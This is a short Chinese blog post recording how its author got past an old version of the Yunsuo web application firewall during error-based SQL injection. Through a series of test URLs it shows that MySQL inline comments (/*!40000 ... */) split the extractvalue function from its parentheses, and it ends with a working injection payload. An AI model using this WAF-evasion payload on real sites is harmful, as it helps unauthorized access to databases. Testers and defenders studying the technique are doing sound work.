老版本云锁bypass小记

起因

最近有空的时候会挖挖漏洞,今天注入的时候遇到了老版本的云锁,简单记录bypass过程

漏洞点

因为漏洞点是一个报错注入,使用?id=extractvalue()函数就会被拦截,如图:

使用?id=extractvalue不被拦截

使用内联注释分离函数和括号

关于内联注释

/* */mysql中是多行注释,但是如果在中间添加了!,那么!后面的内容会被执行,如图:

bypass

构造 ?id=extractvalue/*!()*/被拦截

构造?id=extractvalue/*!1()*/不拦截

构造?id=/*!40000/*!30000extractvalue*/()不拦截

最终payload为:

?id=extractvalue/*!40000(1,concat(char(126),md5(1654670033)))*/

成功注入

参考链接


__EOF__

本文作者春告鳥
本文链接https://www.cnblogs.com/Cl0ud/p/14341616.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   春告鳥  阅读(396)  评论(0编辑  收藏  举报
编辑推荐:
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!
历史上的今天:
2020-01-28 Vim基础命令
点击右上角即可分享
微信分享提示